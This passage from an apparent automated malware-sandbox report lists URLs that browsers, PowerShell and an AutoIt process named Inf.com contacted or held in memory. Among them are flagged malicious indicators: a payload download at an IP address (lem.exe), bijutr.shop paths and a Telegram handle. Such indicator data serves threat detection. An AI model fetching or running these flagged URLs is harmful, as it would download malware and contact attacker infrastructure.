                                          		unknownfalse
                                            		unknown
                                            c.msn.com
                                            		unknown
                                            		unknownfalse
                                              		high
                                              ntp.msn.com
                                              		unknown
                                              		unknownfalse
                                                		high
                                                api.msn.com
                                                		unknown
                                                		unknownfalse
                                                  		high

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://5.252.155.64/lem.exetrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://tse1.mm.bing.net/th?id=OADD2.10239360172398_1SAKF1TLLO2IFUJXJ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90false
                                                    		high
                                                    https://tse1.mm.bing.net/th?id=OADD2.10239402414229_1P4RDVHBQE93FAZFW&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90false
                                                      		high
                                                      https://tse1.mm.bing.net/th?id=OADD2.10239360433145_1P8I9JAN4TGEHJX5M&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90false
                                                        		high
                                                        https://tse1.mm.bing.net/th?id=OADD2.10239381795018_1H6ENBKGWI9ZKTUAB&pid=21.2&c=3&w=1920&h=1080&dynsize=1&qlt=90false
                                                          		high
                                                          https://tse1.mm.bing.net/th?id=OADD2.10239400728442_1ZZPG5YB8L69HFW32&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90false
                                                            		high

                                                            URLs from Memory and Binaries

                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://duckduckgo.com/chrome_newtabInf.com, 0000001A.00000002.3399642735.00000000010C4000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3406158343.000000000658B000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3404275430.0000000004100000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3227450429.00005B3802E8C000.00000004.00000800.00020000.00000000.sdmp, E3O8Y5.26.dr, 37Q1NG.26.dr, Web Data.35.drfalse
                                                              		high
                                                              https://duckduckgo.com/ac/?q=Inf.com, 0000001A.00000002.3399642735.00000000010C4000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3406158343.000000000658B000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3404275430.0000000004100000.00000004.00000800.00020000.00000000.sdmp, E3O8Y5.26.dr, 37Q1NG.26.dr, Web Data.35.drfalse
                                                                		high
                                                                https://permanently-removed.invalid/oauth2/v2/tokeninfomsedge.exe, 00000022.00000003.3310163874.00007CC800280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000022.00000003.3310275479.00007CC800284000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://anglebug.com/4633chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://anglebug.com/7382chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://issuetracker.google.com/284462263chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://polymer.github.io/AUTHORS.txtchrome.exe, 00000020.00000003.3178878629.00005B38032CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178707086.00005B380325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180473530.00005B3803140000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178906970.00005B3803158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178959002.00005B3803298000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181017348.00005B38025B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178839530.00005B380326C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181237570.00005B380340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181164172.00005B3803378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3199742075.00005B38030E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180495269.00005B380263C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180442784.00005B38026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180543809.00005B38031A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://docs.google.com/manifest.json.35.drfalse
                                                                            		high
                                                                            https://photos.google.com/settings?referrer=CHROME_NTPchrome.exe, 00000020.00000003.3177516316.00005B38030E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3177489357.00005B3803198000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://anglebug.com/7714chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://bijutr.shop/TEInf.com, 0000001A.00000002.3403862698.0000000003F94000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                https://photos.google.com?referrer=CHROME_NTPchrome.exe, 00000020.00000003.3181017348.00005B38025B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181237570.00005B380340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181164172.00005B3803378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2227793598.0000012290071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2406464503.0000025483B54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2480705766.0000025492344000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2480705766.000002549220E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://anglebug.com/6248chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://ogs.google.com/widget/callout?eom=1chrome.exe, 00000020.00000003.3218061563.00005B38035CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216999031.00005B380362C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://anglebug.com/6929chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://anglebug.com/5281chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.2199268665.0000012280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2406464503.0000025482191000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://issuetracker.google.com/255411748chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 00000022.00000003.3310163874.00007CC800280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000022.00000003.3310275479.00007CC800284000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://anglebug.com/7246chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://anglebug.com/7369chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.2406464503.00000254823C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2406464503.00000254837B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://anglebug.com/7489chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://duckduckgo.com/?q=chrome.exe, 00000020.00000003.3227450429.00005B3802E8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.2406464503.00000254823C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2406464503.00000254837B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://chrome.google.com/webstorechrome.exe, 00000020.00000003.3175267436.00005B3802F9C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000022.00000002.3394790116.00007CC800194000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://cdnjs.cloudflare.com/ajax/libs/mathjax/offscreendocument_main.js.35.drfalse
                                                                                                                  		high
                                                                                                                  https://drive-daily-2.corp.google.com/manifest.json.35.drfalse
                                                                                                                    		high
                                                                                                                    http://polymer.github.io/PATENTS.txtchrome.exe, 00000020.00000003.3178878629.00005B38032CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178707086.00005B380325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180473530.00005B3803140000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178906970.00005B3803158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178959002.00005B3803298000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181017348.00005B38025B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178839530.00005B380326C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181237570.00005B380340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181164172.00005B3803378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3199742075.00005B38030E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180495269.00005B380263C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180442784.00005B38026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180543809.00005B38031A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://contoso.com/Iconpowershell.exe, 00000009.00000002.2480705766.000002549220E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Inf.com, 0000001A.00000002.3399642735.00000000010C4000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3406158343.000000000658B000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000001A.00000002.3404275430.0000000004100000.00000004.00000800.00020000.00000000.sdmp, E3O8Y5.26.dr, 37Q1NG.26.dr, Web Data.35.drfalse
                                                                                                                          		high
                                                                                                                          http://crl.ver)svchost.exe, 0000000D.00000002.3402996296.0000027D1D000000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://t.me/k04aelm0nk3Mozilla/5.0Inf.com, 0000001A.00000002.3405131990.00000000041E1000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://www.autoitscript.com/autoit3/XInf.com, 0000001A.00000000.2572957359.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp, Silicon.22.dr, Inf.com.15.drfalse
                                                                                                                                		high
                                                                                                                                https://issuetracker.google.com/161903006chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://www.ecosia.org/newtab/Inf.com, 0000001A.00000002.3404275430.0000000004100000.00000004.00000800.00020000.00000000.sdmp, 37Q1NG.26.drfalse
                                                                                                                                    		high
                                                                                                                                    https://drive-daily-1.corp.google.com/manifest.json.35.drfalse
                                                                                                                                      		high
                                                                                                                                      https://bijutr.shop/h$Inf.com, 0000001A.00000002.3403862698.0000000003F94000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                      		unknown
                                                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.2406464503.00000254823C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2406464503.00000254837B7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://drive-daily-5.corp.google.com/manifest.json.35.drfalse
                                                                                                                                          		high
                                                                                                                                          https://duckduckgo.com/favicon.icochrome.exe, 00000020.00000003.3227450429.00005B3802E8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000022.00000003.3310163874.00007CC800280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000022.00000003.3310275479.00007CC800284000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://anglebug.com/3078chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://anglebug.com/7553chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://anglebug.com/5375chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000022.00000003.3310163874.00007CC800280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000022.00000003.3310275479.00007CC800284000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://anglebug.com/5371chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://anglebug.com/4722chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000022.00000003.3310163874.00007CC800280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000022.00000003.3310275479.00007CC800284000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://5.252.155.64/lem.exeUSERDOMAIN=user-PCUSERNAME=userUSERPROFILE=C:msedge.exe, 00000022.00000002.3391908872.00006F2800268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000022.00000002.3390527870.000027C40025C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.2199268665.0000012280228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://anglebug.com/7556chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://chromewebstore.google.com/msedge.exe, 00000022.00000002.3394790116.00007CC800194000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://drive-preprod.corp.google.com/manifest.json.35.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 00000022.00000003.3310163874.00007CC800280000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000022.00000003.3310275479.00007CC800284000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://anglebug.com/6692chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://issuetracker.google.com/258207403chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://5.252.155.64/lem.exeUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=ENGImsedge.exe, 00000022.00000002.3389838879.0000024C6B3B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://5.252.155.64/lem.exeProgramW6432=C:msedge.exe, 00000022.00000002.3388154059.0000024C69413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://5.252.155.64/lem.exe#tasklist.exe, 00000011.00000002.2544941760.00000000031B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                          		unknown
                                                                                                                                                                          http://anglebug.com/3502chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://anglebug.com/3623chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://anglebug.com/3625chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://anglebug.com/3624chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://t.mInf.com, 0000001A.00000003.2971341246.0000000001057000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000003.2971644605.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000001A.00000003.2971377296.0000000000FB9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://anglebug.com/5007chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://anglebug.com/3862chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://chrome.google.com/webstoreLDDiscoverchrome.exe, 00000020.00000003.3179742032.00005B3802F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3175094763.00005B38026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3184755862.00005B3802F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3175834331.00005B3802EFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178580186.00005B3802F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3175267436.00005B3802F9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://anglebug.com/4836chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://issuetracker.google.com/issues/166475273chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://ch.search.yahoo.com/favicon.icochrome.exe, 00000020.00000003.3227450429.00005B3802E8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://5.252.155.64/lem.exeUSERDOMAIN=user-PCUSERDOMAIN_putt.exe, 0000000E.00000003.2512736823.0000000000659000.00000004.00000020.00020000.00000000.sdmp, putt.exe, 0000000E.00000003.2512232759.0000000000659000.00000004.00000020.00020000.00000000.sdmp, putt.exe, 0000000E.00000002.2514229684.0000000000659000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                http://5.252.155.64/lem.exeUSERPROFILE=C:msedge.exe, 00000022.00000002.3391226276.000058680024C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                https://msn.com/msedge.exe, 00000022.00000002.3395300667.00007CC8003A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://anglebug.com/4384chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://mail.google.com/mail/?tab=rm&amp;ogblchrome.exe, 00000020.00000003.3221883406.00005B38036A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3218020340.00005B38035B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216458930.00005B3803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216269253.00005B38035B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216521834.00005B3803670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216633834.00005B3803678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3218061563.00005B38035CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://anglebug.com/3970chrome.exe, 00000020.00000003.3171395105.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174741829.00005B3802590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3174773771.00005B380263C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://policies.google.com/chrome.exe, 00000020.00000003.3177516316.00005B38030E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3177489357.00005B3803198000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://apis.google.comchrome.exe, 00000020.00000003.3218061563.00005B38035CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216999031.00005B380362C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://bijutr.shop/opInf.com, 0000001A.00000002.3403862698.0000000003F94000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://polymer.github.io/CONTRIBUTORS.txtchrome.exe, 00000020.00000003.3178878629.00005B38032CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178707086.00005B380325C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180473530.00005B3803140000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178906970.00005B3803158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178959002.00005B3803298000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181017348.00005B38025B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3178839530.00005B380326C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181237570.00005B380340C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3181164172.00005B3803378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3199742075.00005B38030E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180495269.00005B380263C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180442784.00005B38026BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3180543809.00005B38031A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://labs.google.com/search?source=ntpchrome.exe, 00000020.00000003.3221883406.00005B38036A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3218020340.00005B38035B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216458930.00005B3803668000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216269253.00005B38035B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216521834.00005B3803670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3216633834.00005B3803678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000020.00000003.3218061563.00005B38035CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
